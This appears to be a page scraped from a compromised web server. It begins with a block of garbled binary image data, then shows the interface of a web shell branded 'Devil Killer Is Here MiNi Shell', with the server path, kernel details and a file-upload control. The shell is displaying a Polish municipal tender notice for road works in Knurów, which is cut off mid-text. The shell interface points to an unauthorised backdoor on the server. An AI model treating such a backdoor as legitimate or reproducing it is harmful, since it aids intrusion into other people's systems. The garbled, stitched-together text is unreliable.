JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210521/0006130001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00061300 z dnia 2021-05-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie dróg z płyt betonowo – ażurowych – Część 1<br/>pn.: „Przebudowa ul. Targowej w Knurowie w zakresie parametrów użytkowych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Knurów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257587</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dr. Floriana Ogana 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Knurów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 235 10 17</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@knurow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.knurow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dróg z płyt betonowo – ażurowych – Część 1<br/>pn.: „Przebudowa ul. Targowej w Knurowie w zakresie parametrów użytkowych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a5d6cfa2-b88d-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00061300</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000631/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Wykonanie dróg z płyt betonowo – ażurowych – Część 1 pn.: „Przebudowa ul. Targowej w Knurowie w zakresie parametrów użytkowych”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami, odbywa się przy użyciu: a) miniPortalu, który jest dostępny pod adresem: https://miniportal.uzp.gov.pl/ b) poczty elektronicznej, c) ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP. <br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularza do złożenia, zmiany, <br/>wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”, 2. Wymagania techniczne i <br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i <br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie <br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług <br/>administracji publicznej (ePUAP). 3. Maksymalny rozmiar plików przesyłanych za pośrednictwem <br/>dedykowanych formularzy: „Formularza złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza <br/>do komunikacji” wynosi 150 MB 4. Sposób komunikowania się Zamawiającego z Wykonawcami (nie <br/>dotyczy składania ofert): 1) w niniejszym postępowaniu komunikacja pomiędzy Zamawiającym a <br/>Wykonawcami w szczególności składanie oświadczeń, zawiadomień oraz przekazywania informacji <br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” <br/>dostępnego na ePUAP oraz udostępnionego również na miniPortalu. We wszelkiej korespondencji <br/>związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia <br/>z BZP lub ID postępowania lub numerem referencyjnym postępowania wskazanym w poniżej w Sekcji <br/>IV pkt 4.1.2), 2) Wykonawca może również komunikować się z Zamawiającym za pomocą poczty <br/>elektronicznej, email: zp@knurow.pl 3) dokumenty elektroniczne, składane są przez Wykonawcę za <br/>pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również <br/>możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w <br/>punkcie powyżej adres email. 5. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z <br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w <br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych <br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z <br/>2020 poz. 2415). 6. Zgodnie z § 11 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia <br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie <br/>zamówienia publicznego lub konkursie (zwane dalej rozporządzeniem) określa się niezbędne <br/>wymagania sprzętowo - aplikacyjne umożliwiające korzystanie z poczty elektronicznej Zamawiającego: <br/>1) dostęp do sieci Internet o minimalnej przepustowości nie mniejszej niż 10 MB/s 2) komputer klasy <br/>PC lub MAC o parametrach wymaganych przez zainstalowany system operacyjny (np. MS Windows 7, <br/>Mac Os x 10,4, Linux lub ich nowsze wersje) 3) zainstalowane oprogramowanie umożliwiające <br/>wysyłanie wiadomości e-mail 4) zainstalowany program Adobe Acrobat lub inny obsługujący pliki w <br/>formacie .pdf. 5) dopuszczalny łączny rozmiar przesyłanych plików w jednej wiadomości za <br/>pośrednictwem poczty elektronicznej wynosi 30MB, załącznik, którego łączny rozmiar będzie większy <br/>niż 30 MB należy przesłać w kilku odrębnych wiadomościach email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 Rozporządzenia Parlamentu <br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w <br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz <br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy, że: 1) <br/>Administratorem danych jest Prezydent Miasta Knurów, z siedzibą w Urzędzie Miasta Knurów, 44-190 <br/>Knurów, ul. dr. Floriana Ogana 5, tel.: (32) 339-22-66 lub 235-10-17, fax.: (32) 235-15-21, e-mail: <br/>um@knurow.pl, strona internetowa: www.knurow.pl, BIP: www.knurow.bip.info.pl. 2) W sprawach <br/>związanych z przetwarzaniem danych osobowych można się kontaktować z Inspektorem Ochrony <br/>Danych, dostępnym pod adresem e-mail: iod@mail.knurow.eu. Osoby niekorzystające z poczty <br/>elektronicznej mogą złożyć zapytanie pisemne: a) osobiście do Biura Obsługi Interesanta (Biuro <br/>Podawcze Urzędu – parter), 44-190 Knurów, ul. dr. Floriana Ogana 5, b) pocztą tradycyjną na adres <br/>Urząd Miasta Knurów, 44-190 Knurów, ul. dr. Floriana Ogana 5, c) z wykorzystaniem pisma ogólnego <br/>na platformie SEKAP(PeUP) /ePUAP, potwierdzonego Profilem Zaufanym lub kwalifikowanym <br/>podpisem elektronicznym, wskazując formę w jakiej oczekują odpowiedzi i podając dane kontaktowe <br/>niezbędne do sposobu udzielenia odpowiedzi. 3) Dane osobowe są gromadzone i przetwarzane w <br/>celu: a) przeprowadzenia postępowania o zamówienie publiczne, na podstawie art. 6 ust. 1 lit. c) - <br/>przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze - <br/>Ustawa z dnia 11 września 2019r. Prawo zamówień publicznych; b) przeprowadzenia postępowania o <br/>zamówienie publiczne, na podstawie art. 6 ust. 1 lit. e) – przetwarzanie jest niezbędne do wykonania <br/>zadania realizowanego w interesie publicznym albo w ramach sprawowania władzy publicznej - <br/>Ustawa z dnia 11 września 2019r. Prawo zamówień publicznych; c) wykonania umowy, której stroną <br/>jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed <br/>zawarciem umowy, na podstawie art. 6 ust. 1 lit. b). 4) Podanie przez Pana/Panią danych osobowych <br/>jest niezbędne do wypełnienia obowiązku prawnego, wykonania zadania realizowanego w interesie <br/>publicznym oraz do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia <br/>działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy. W przypadku niepodania <br/>swoich danych, nie będzie możliwości: a) wypełnienia obowiązku prawnego, wykonania zadania <br/>realizowanego w interesie publicznym - przeprowadzenie postępowania o zamówienie publiczne. Może <br/>to skutkować konsekwencjami przewidzianymi przepisami prawa; b) zawarcia lub wykonania umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje wykonanie dróg z płyt betonowo – ażurowych „Przebudowa ul. Targowej w Knurowie w zakresie parametrów użytkowych” w tym:<br/> a) przebudowa łuków wjazdowych o promieniu R3 na łuki o promieniu R5, w zakresie granic pasa drogowego;<br/> b) wymiana krawężników i wykonanie nowej nawierzchni asfaltowej;<br/> c) przebudowa 16 istniejących miejsc postojowych (zmiana układu);<br/> d) wykonanie 8 miejsc postojowych; <br/> e) przebudowa chodników. <br/> 2. Szczegółowy zakres robót określają: dokumentacja wykonania robót, obmiar robót, „Specyfikacje techniczne wykonania i odbioru robót”, ustalenia wynikające z wzoru umowy. Wykonawca obowiązany jest zapoznać się z SWZ i jej załącznikami i zrealizować zamówienie na zasadach i warunkach w nich opisanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania prac</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z udziału w postępowaniu w okolicznościach wskazanych w art. 108 ust. 1 PZP oraz w art. 109 ust. 1 pkt 1) i pkt 4) PZP, z zastrzeżeniem art. 110 ust. 2 PZP.<br/> 2. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/> 3) sytuacji ekonomicznej lub finansowej. <br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/> 4) zdolności technicznej lub zawodowej:<br/> Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, że:<br/> a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane o wartości minimum 100.000,00 zł brutto każda, polegającej na ułożeniu nawierzchni z kostki brukowej lub nawierzchni asfaltobetonowej. <br/> Warunek, o którym mowa powyżej zostanie spełniony, jeżeli jeden podmiot wykaże, że posiada doświadczenie w wykonaniu dwóch takich zamówień.<br/> b) dysponuje sprzętem niezbędnym do realizacji zamówienia gwarantującym rzetelne i sprawne wykonanie roboty budowlanej, w tym co najmniej:<br/> b.1) jedną koparką na podwoziu kołowym, <br/> b.2) jedną rozkładarką mas bitumicznych,<br/> b.3) jednym walcem o masie całkowitej minimum 10 t<br/> c) dysponuje osobą skierowaną do realizacji zamówienia, o niżej wskazanych kwalifikacjach zawodowych: <br/> kierownik budowy, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej.<br/> Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą Prawo budowlane z dn. 7 lipca 1994 r. art. 12 ust. 1 ppkt 2), ust. 7, art. 12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane z 1994 r., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej, a także osób z Europejskiego Obszaru Gospodarczego (tj. Królestwo Norwegii, Księstwo Liechtensteinu, Republika Islandii) i obywateli Konfederacji Szwajcarskiej, posiadane uprawnienia muszą spełniać warunki określone w Ustawie z dn. 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 z późn. zm.). Osoby spoza terytorium Rzeczpospolitej Polskiej muszą legitymować się decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą izbą.<br/> 3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/> 4. Wykluczenie Wykonawcy może nastąpić na każdym etapie postępowania o udzielenie zamówienia.<br/> 5. W celu potwierdzenia braku podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu Wykonawca składa podmiotowe środki dowodowe wymienione w Rozdziale 5 SWZ, na wezwanie w trybie art. 274 ust. 1 PZP.<br/> 6. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o złożone podmiotowe środki dowodowe wg metody „spełnia/nie spełnia”.<br/> 7. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa wyżej w ust. 1 i 2 zostaną spełnione jeżeli:<br/> 1) żaden z Wykonawców występujących wspólnie nie będzie podlegać wykluczeniu z postępowania,<br/> 2) Wykonawcy łącznie spełnią warunki udziału w postępowaniu, za wyjątkiem wskazanych w Rozdz. 4 ust. 2 pkt 4) lit. a) SWZ.<br/> 3) W odniesieniu do warunków dotyczących doświadczenia wskazanych w Rozdz. 4 ust. 2 pkt 4) lit. a) SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane – a wykazanych w oświadczeniu stanowiącym zał. nr 5 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/> Zakres wykazu musi potwierdzać spełnianie odpowiednio warunku określonego w Rozdziale 4 ust. 2 pkt 4) lit. a) SWZ w zakresie doświadczenia. Wzór wykazu stanowi Załącznik nr 7a do SWZ. <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykaz wraz z dowodami składa ten z Wykonawców, który wykazuje spełnianie warunku, z zastrzeżeniem Rozdz. 4 ust. 2 pkt 4) lit. a) SWZ. <br/> b) wykaz narzędzi wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami; <br/> Zakres ww. dokumentu musi potwierdzać spełnienie odpowiednio warunku określonego w Rozdziale 4 ust. 2 pkt 4) lit. b) SWZ. Wzór wykazu stanowi Załącznik nr 7b do SWZ. W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców. <br/> c) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/> Zakres ww. dokumentu musi potwierdzać spełnienie odpowiednio warunku określonego w Rozdziale 4 ust. 2 pkt 4) lit. c) SWZ. <br/> Wzór wykazu stanowi Załącznik nr 7c do SWZ. <br/> d) W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców.<br/> e) Jeżeli dokumenty, o których mowa powyżej w lit. a) będą wskazywały 